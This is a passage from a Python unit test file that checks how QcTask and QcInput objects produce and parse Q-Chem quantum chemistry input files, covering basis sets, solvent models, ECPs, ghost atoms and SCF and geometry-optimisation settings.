xyz2 = converted_coords_tokens[1:]
for t1, t2 in zip(xyz1, xyz2):
self.assertTrue(abs(float(t1)-float(t2)) < 0.0001)
def test_no_mol(self):
ans = '''$comment
Test Methane
$end
$molecule
-1 2
read
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
$end
'''
qctask = QcTask(molecule="READ", title="Test Methane",
exchange="B3LYP", jobtype="SP", charge=-1,
spin_multiplicity=2,
basis_set="6-31+G*")
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_simple_basis_str(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_fragmented_molecule(self):
mol1 = copy.deepcopy(mol)
mol1.set_charge_and_spin(1, 2)
mol2 = copy.deepcopy(water_mol)
mol2.set_charge_and_spin(-1, 2)
qctask = QcTask([mol1, mol2], title="Test Fragments", exchange="B3LYP",
jobtype="bsse", charge=0, spin_multiplicity=3, basis_set="6-31++G**")
ans = """$comment
Test Fragments
$end
$molecule
0 3
--
1 2
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
--
-1 2
O 2.63227300 -0.31350400 -0.75037600
H 3.26818200 -0.93731000 -0.43146400
H 2.18419800 -0.75330500 -1.46905900
$end
$rem
jobtype = bsse
exchange = b3lyp
basis = 6-31++g**
$end
"""
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_mixed_basis_str(self):
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set=[("C", "6-311G*"), ("H", "6-31g(d,p)"), ("H", "6-31g(d,p)"),
("H", "6-31g*"), ("cl", "6-31+g*")])
ans_mixed = """$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = mixed
$end
$basis
C 1
6-311g*
****
H 2
6-31g(d,p)
****
H 3
6-31g(d,p)
****
H 4
6-31g*
****
Cl 5
6-31+g*
****
$end
"""
self.assertEqual(ans_mixed, str(qctask))
self.elementary_io_verify(ans_mixed, qctask)
qctask.set_basis_set("6-31+G*")
ans_simple = """$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
$end
"""
self.assertEqual(str(qctask), ans_simple)
qctask.set_basis_set([("C", "6-311G*"), ("H", "6-31g(d,p)"), ("H", "6-31g(d,p)"),
("H", "6-31g*"), ("cl", "6-31+g*")])
self.assertEqual(str(qctask), ans_mixed)
self.elementary_io_verify(ans_mixed, qctask)
def test_opt_constraint_str(self):
opt_coords = [[-1.8438708, 1.7639844, 0.0036111],
[-0.3186117, 1.7258535, 0.0241264],
[0.1990523, 0.2841796, -0.0277432],
[1.7243049, 0.2460376, -0.0067397],
[-2.1904881, 2.8181992, 0.0419217],
[-2.2554858, 1.2221552, 0.8817436],
[-2.2293542, 1.2964646, -0.9274861],
[0.0400963, 2.2185950, 0.9541706],
[0.0663274, 2.2929337, -0.8514870],
[-0.1594453, -0.2084377, -0.9579392],
[-0.1860888, -0.2830148, 0.8477023],
[2.1362687, 0.7881530, -0.8845274],
[2.0709344, -0.8081667, -0.0452220],
[2.1094213, 0.7132527, 0.9246668]]
opt_mol = Molecule(["C", "C", "C", "C", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H"], opt_coords)
constraint_dict = {'opt': [['tors', 1, 2, 3, 4, 180.0]]}
ans = """$molecule
0 1
C -1.84387080 1.76398440 0.00361110
C -0.31861170 1.72585350 0.02412640
C 0.19905230 0.28417960 -0.02774320
C 1.72430490 0.24603760 -0.00673970
H -2.19048810 2.81819920 0.04192170
H -2.25548580 1.22215520 0.88174360
H -2.22935420 1.29646460 -0.92748610
H 0.04009630 2.21859500 0.95417060
H 0.06632740 2.29293370 -0.85148700
H -0.15944530 -0.20843770 -0.95793920
H -0.18608880 -0.28301480 0.84770230
H 2.13626870 0.78815300 -0.88452740
H 2.07093440 -0.80816670 -0.04522200
H 2.10942130 0.71325270 0.92466680
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
$end
$opt
CONSTRAINT
tors 1 2 3 4 180.0
ENDCONSTRAINT
$end
"""
qctask = QcTask(opt_mol, exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*",
optional_params=constraint_dict)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_partial_hessian(self):
qcinp1 = QcInput.from_file(os.path.join(test_dir, "partial_hessian.qcinp"))
ans = """$molecule
0 1
C -1.76827000 0.46495000 0.28695000
O 1.78497000 -0.42034000 -0.39845000
H -0.77736000 0.78961000 0.66548000
H -1.75896000 0.46604000 -0.82239000
H -2.54983000 1.16313000 0.65101000
H -1.98693000 -0.55892000 0.65381000
H 2.14698000 -0.07173000 0.45530000
H 1.25596000 -1.21510000 -0.13726000
$end
$rem
jobtype = freq
exchange = b3lyp
basis = 6-31g*
n_sol = 3
phess = true
$end
$alist
3
7
8
$end
"""
self.assertEqual(ans, str(qcinp1))
self.elementary_io_verify(ans, qcinp1.jobs[0])
qcinp1.jobs[0].params["rem"]["jobtype"] = "sp"
qcinp1.jobs[0].params["rem"]["phess"] = 3
qcinp1.jobs[0].set_partial_hessian_atoms([2, 3, 4, 5, 6])
ans = """$molecule
0 1
C -1.76827000 0.46495000 0.28695000
O 1.78497000 -0.42034000 -0.39845000
H -0.77736000 0.78961000 0.66548000
H -1.75896000 0.46604000 -0.82239000
H -2.54983000 1.16313000 0.65101000
H -1.98693000 -0.55892000 0.65381000
H 2.14698000 -0.07173000 0.45530000
H 1.25596000 -1.21510000 -0.13726000
$end
$rem
jobtype = freq
exchange = b3lyp
basis = 6-31g*
n_sol = 5
phess = True
$end
$alist
2
3
4
5
6
$end
"""
self.assertEqual(ans, str(qcinp1))
def test_basis2_mixed(self):
qcinp1 = QcInput.from_file(os.path.join(test_dir, "basis2_mixed.inp"))
ans = """$molecule
0 1
C -1.76827000 0.46495000 0.28695000
O 1.78497000 -0.42034000 -0.39845000
H -0.77736000 0.78961000 0.66548000
H -1.75896000 0.46604000 -0.82239000
H -2.54983000 1.16313000 0.65101000
H -1.98693000 -0.55892000 0.65381000
H 2.14698000 -0.07173000 0.45530000
H 1.25596000 -1.21510000 -0.13726000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = mixed
basis2 = basis2_mixed
purecart = 1111
$end
$basis
C 1
6-311+g(3df)
****
O 2
aug-cc-pvtz
****
H 3
6-31g*
****
H 4
6-31g*
****
H 5
6-31g*
****
H 6
6-31g*
****
H 7
cc-pvdz
****
H 8
cc-pvdz
****
$end
$basis2
C 1
sto-3g
****
O 2
sto-3g
****
H 3
sto-3g
****
H 4
sto-3g
****
H 5
sto-3g
****
H 6
sto-3g
****
H 7
sto-3g
****
H 8
sto-3g
****
$end
"""
self.assertEqual(str(qcinp1), ans)
self.elementary_io_verify(ans, qcinp1.jobs[0])
basis2 = qcinp1.jobs[0].params["basis2"]
qcinp2 = copy.deepcopy(qcinp1)
qcinp2.jobs[0].set_basis2("3-21g")
self.assertEqual(qcinp2.jobs[0].params["rem"]["basis2"], "3-21g")
self.assertFalse("basis2" in qcinp2.jobs[0].params)
qcinp2.jobs[0].set_basis2(basis2)
self.assertEqual(str(qcinp2), ans)
def test_aux_basis_str(self):
ans_gen = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = freq
exchange = xygjos
basis = gen
aux_basis = gen
$end
$aux_basis
C
rimp2-cc-pvdz
****
Cl
rimp2-aug-cc-pvdz
****
H
rimp2-cc-pvdz
****
$end
$basis
C
6-31g*
****
Cl
6-31+g*
****
H
6-31g*
****
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="xygjos",
jobtype="Freq",
basis_set={"C": "6-31G*", "h": "6-31g*",
"CL": "6-31+g*"},
aux_basis_set={"c": "rimp2-cc-pvdz",
"H": "rimp2-cc-pvdz",
"Cl": "rimp2-aug-cc-pvdz"})
self.assertEqual(str(qctask), ans_gen)
self.elementary_io_verify(ans_gen, qctask)
qctask.set_auxiliary_basis_set([("C", "aug-cc-pvdz"), ("H", "cc-pvdz"), ("H", "cc-pvdz"),
("H", "cc-pvdz"), ("cl", "rimp2-aug-cc-pvdz")])
ans_mixed_aux = """$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = freq
exchange = xygjos
basis = gen
aux_basis = mixed
$end
$aux_basis
C 1
aug-cc-pvdz
****
H 2
cc-pvdz
****
H 3
cc-pvdz
****
H 4
cc-pvdz
****
Cl 5
rimp2-aug-cc-pvdz
****
$end
$basis
C
6-31g*
****
Cl
6-31+g*
****
H
6-31g*
****
$end
"""
self.assertEqual(ans_mixed_aux, str(qctask))
self.elementary_io_verify(ans_mixed_aux, qctask)
qctask.set_basis_set("6-31+G*")
qctask.set_auxiliary_basis_set("rimp2-cc-pvdz")
ans_simple = """$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = freq
exchange = xygjos
basis = 6-31+g*
aux_basis = rimp2-cc-pvdz
$end
"""
self.assertEqual(ans_simple, str(qctask))
self.elementary_io_verify(ans_simple, qctask)
qctask.set_basis_set({"C": "6-31G*", "h": "6-31g*",
"CL": "6-31+g*"})
qctask.set_auxiliary_basis_set([("C", "aug-cc-pvdz"), ("H", "cc-pvdz"), ("H", "cc-pvdz"),
("H", "cc-pvdz"), ("cl", "rimp2-aug-cc-pvdz")])
self.assertEqual(ans_mixed_aux, str(qctask))
self.elementary_io_verify(ans_mixed_aux, qctask)
def test_ecp_str(self):
ans = '''$comment
Test ECP
$end
$molecule
0 1
Br 0.00000000 0.00000000 -2.40000000
Cd 0.00000000 0.00000000 0.00000000
Br 0.00000000 0.00000000 2.40000000
$end
$rem
jobtype = opt
exchange = b3lyp
basis = gen
ecp = gen
$end
$basis
Br
srlc
****
Cd
srsc
****
$end
$ecp
Br
srlc
****
Cd
srsc
****
$end
'''
qctask = QcTask(heavy_mol, title="Test ECP", exchange="B3LYP",
jobtype="Opt",
basis_set={"Br": "srlc", "Cd": "srsc"},
ecp={"Br": "SrlC", "Cd": "srsc"})
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_memory(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
mem_static = 500
mem_total = 18000
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_memory(total=18000, static=500)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_qc42_pcm_solvent_format(self):
text = '''$molecule
-1 2
N -0.00017869 0.00010707 0.20449990
H 0.89201838 0.20268122 -0.29656572
H -0.62191133 0.67135171 -0.29649162
H -0.26987729 -0.87406458 -0.29659779
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
solvent_method = pcm
$end
$pcm
theory ssvpe
vdwscale 1.1
$end
$pcm_solvent
dielectric 78.3553
$end
'''
qctask_qc41 = QcTask.from_string(text)
qctask_qc42 = copy.deepcopy(qctask_qc41)
solvent_params = qctask_qc42.params.pop("pcm_solvent")
qctask_qc42.params["solvent"] = solvent_params
ans = '''$molecule
-1 2
N -0.00017869 0.00010707 0.20449990
H 0.89201838 0.20268122 -0.29656572
H -0.62191133 0.67135171 -0.29649162
H -0.26987729 -0.87406458 -0.29659779
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
solvent_method = pcm
$end
$pcm
theory ssvpe
vdwscale 1.1
$end
$solvent
dielectric 78.3553
$end
'''
self.assertEqual(str(qctask_qc42), ans)
self.elementary_io_verify(ans, qctask_qc42)
def test_set_max_num_of_scratch_files(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
max_sub_file_num = 500
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_max_num_of_scratch_files(500)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_max_scf_iterations(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
max_scf_cycles = 100
scf_algorithm = diis_gdm
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_scf_algorithm_and_iterations(algorithm="diis_gdm",
iterations=100)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_scf_convergence_threshold(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
scf_convergence = 8
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_scf_convergence_threshold(exponent=8)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_integral_threshold(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
thresh = 14
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_integral_threshold(thresh=14)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_dft_grid(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
xc_grid = 000110000590
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_dft_grid(radical_points=110, angular_points=590)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_scf_initial_guess(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
scf_guess = gwh
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_scf_initial_guess("GWH")
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_geom_opt_max_cycles(self):
ans = '''$comment
Test Methane
$end
$molecule
1 2
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
geom_opt_max_cycles = 100
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP", charge=1, spin_multiplicity=2,
basis_set="6-31+G*")
qctask.set_geom_max_iterations(100)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_geom_opt_coords_type(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
geom_opt_coords = 0
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_geom_opt_coords_type("cartesian")
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_scale_geom_opt_threshold(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
geom_opt_tol_displacement = 120
geom_opt_tol_energy = 10
geom_opt_tol_gradient = 30
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.scale_geom_opt_threshold(gradient=0.1, displacement=0.1,
energy=0.1)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_set_geom_opt_use_gdiis(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
geom_opt_max_diis = -1
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.set_geom_opt_use_gdiis()
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_disable_symmetry(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
sym_ignore = True
symmetry = False
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.disable_symmetry()
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_use_cosmo(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
solvent_dielectric = 35.0
solvent_method = cosmo
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.use_cosmo(dielectric_constant=35.0)
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_wrap_comment(self):
ans = '''$comment
5_2_2_methoxyethoxy_ethoxy_6_nitro_1_3_dihydro_2_1_3_benzothiadiazole
singlet neutral B3lYP/6-31+G* geometry optimization
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
$end
'''
qctask = QcTask(mol, title=" 5_2_2_methoxyethoxy_ethoxy_6_nitro_1_3_dihydro_2_1_3_benzothiadiazole singlet "
"neutral B3lYP/6-31+G* geometry optimization", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
title = ''' MgBPh42 singlet neutral PBE-D3/6-31+G* geometry optimization
<SCF Fix Strategy>{
"current_method_id": 1,
"methods": [
"increase_iter",
"diis_gdm",
"gwh",
"rca",
"gdm",
"core+gdm"
]
}</SCF Fix Strategy>'''
ans = '''$comment
MgBPh42 singlet neutral PBE-D3/6-31+G* geometry optimization
<SCF Fix Strategy>{
"current_method_id": 1,
"methods": [
"increase_iter",
"diis_gdm",
"gwh",
"rca",
"gdm",
"core+gdm"
]
}</SCF Fix Strategy>
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
$end
'''
qctask = QcTask(mol, title=title, exchange="B3LYP", jobtype="SP", basis_set="6-31+G*")
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
title = " 5_2_2_methoxyethoxy_ethoxy_6_nitro_1_3_dihydro_2_1_3_benzothiadiazole singlet neutral " \
"B3lYP/6-31+G* geometry optimization" + \
'''<SCF Fix Strategy>{
"current_method_id": 1,
"methods": [
"increase_iter",
"diis_gdm",
"gwh",
"rca",
"gdm",
"core+gdm"
]
}</SCF Fix Strategy>'''
qctask = QcTask(mol, title=title, exchange="B3LYP", jobtype="SP", basis_set="6-31+G*")
self.elementary_io_verify(str(qctask), qctask)
def test_use_pcm_qc41(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
solvent_method = pcm
$end
$pcm
radii uff
theory ssvpe
vdwscale 1.1
$end
$pcm_solvent
dielectric 78.3553
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.use_pcm(solvent_key="pcm_solvent")
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.use_pcm(pcm_params={"Radii": "FF",
"Theory": "CPCM",
"SASrad": 1.5,
"HPoints": 1202},
solvent_params={"Dielectric": 20.0,
"Temperature": 300.75,
"NSolventAtoms": 2,
"SolventAtom": [[8, 1, 186, 1.30],
[1, 2, 187, 1.01]]},
radii_force_field="OPLSAA",
solvent_key="pcm_solvent")
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
force_fied = oplsaa
solvent_method = pcm
$end
$pcm
hpoints 1202
radii bondi
sasrad 1.5
theory cpcm
vdwscale 1.1
$end
$pcm_solvent
dielectric 20.0
nsolventatoms 2
solventatom 8 1 186 1.30
solventatom 1 2 187 1.01
temperature 300.75
$end
'''
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_use_pcm_qc42(self):
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
solvent_method = pcm
$end
$pcm
radii uff
theory ssvpe
vdwscale 1.1
$end
$solvent
dielectric 78.3553
$end
'''
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.use_pcm()
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
qctask = QcTask(mol, title="Test Methane", exchange="B3LYP",
jobtype="SP",
basis_set="6-31+G*")
qctask.use_pcm(pcm_params={"Radii": "FF",
"Theory": "CPCM",
"SASrad": 1.5,
"HPoints": 1202},
solvent_params={"Dielectric": 20.0,
"Temperature": 300.75,
"NSolventAtoms": 2,
"SolventAtom": [[8, 1, 186, 1.30],
[1, 2, 187, 1.01]]},
radii_force_field="OPLSAA")
ans = '''$comment
Test Methane
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
force_fied = oplsaa
solvent_method = pcm
$end
$pcm
hpoints 1202
radii bondi
sasrad 1.5
theory cpcm
vdwscale 1.1
$end
$solvent
dielectric 20.0
nsolventatoms 2
solventatom 8 1 186 1.30
solventatom 1 2 187 1.01
temperature 300.75
$end
'''
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
def test_ghost_atoms(self):
qctask = QcTask(mol, charge=0, spin_multiplicity=1, exchange="B3LYP", ghost_atoms=[2, 4])
ans = """$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
@H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
@Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-31+g*
$end
"""
self.assertEqual(str(qctask), ans)
self.elementary_io_verify(ans, qctask)
mol1 = copy.deepcopy(mol)
mol1.set_charge_and_spin(1, 2)
mol2 = copy.deepcopy(water_mol)
mol2.set_charge_and_spin(-1, 2)
qctask = QcTask([mol1, mol2], title="Test Fragments", exchange="B3LYP",
jobtype="bsse", charge=0, spin_multiplicity=3, basis_set="6-31++G**",
ghost_atoms=[1, 2, 3, 5])
self.elementary_io_verify(str(qctask), qctask)
qctask = QcTask(mol, charge=0, spin_multiplicity=2, exchange="B3LYP", ghost_atoms=[2])
self.assertEqual(qctask.spin_multiplicity, 2)
class TestQcInput(PymatgenTest):
def test_str_and_from_string(self):
ans = '''$comment
Test Methane Opt
$end
$molecule
0 1
C 0.00000000 0.00000000 0.00000000
H 0.00000000 0.00000000 1.08900000
H 1.02671900 0.00000000 -0.36300000
H -0.51336000 -0.88916500 -0.36300000
Cl -0.51336000 0.88916500 -0.36300000
$end
$rem
jobtype = opt
exchange = b3lyp
basis = 6-31+g*
$end
@@@
$comment
Test Methane Frequency
$end
$molecule
read
$end
$rem
jobtype = freq
exchange = b3lyp
basis = 6-31+g*
$end
@@@
$comment
Test Methane Single Point Energy
$end
$molecule
read
$end
$rem
jobtype = sp
exchange = b3lyp
basis = 6-311+g(3df,2p)
$end
'''
qctask1 = QcTask(mol, title="Test Methane Opt", exchange="B3LYP",
jobtype="Opt", basis_set="6-31+G*")
qctask2 = QcTask(molecule="read", title="Test Methane Frequency",
exchange="B3LYP", jobtype="Freq", basis_set="6-31+G*")
qctask3 = QcTask(title="Test Methane Single Point Energy",
exchange="B3LYP", jobtype="SP",
basis_set="6-311+G(3df,2p)")
qcinp1 = QcInput(jobs=[qctask1, qctask2, qctask3])
self.assertEqual(str(qcinp1), ans)
qcinp2 = QcInput.from_string(ans)
self.assertEqual(qcinp1.as_dict(), qcinp2.as_dict())
qcinp_mgbf4 = QcInput.from_file(os.path.join(test_dir, "MgBF4_b_overalpped.qcinp"))
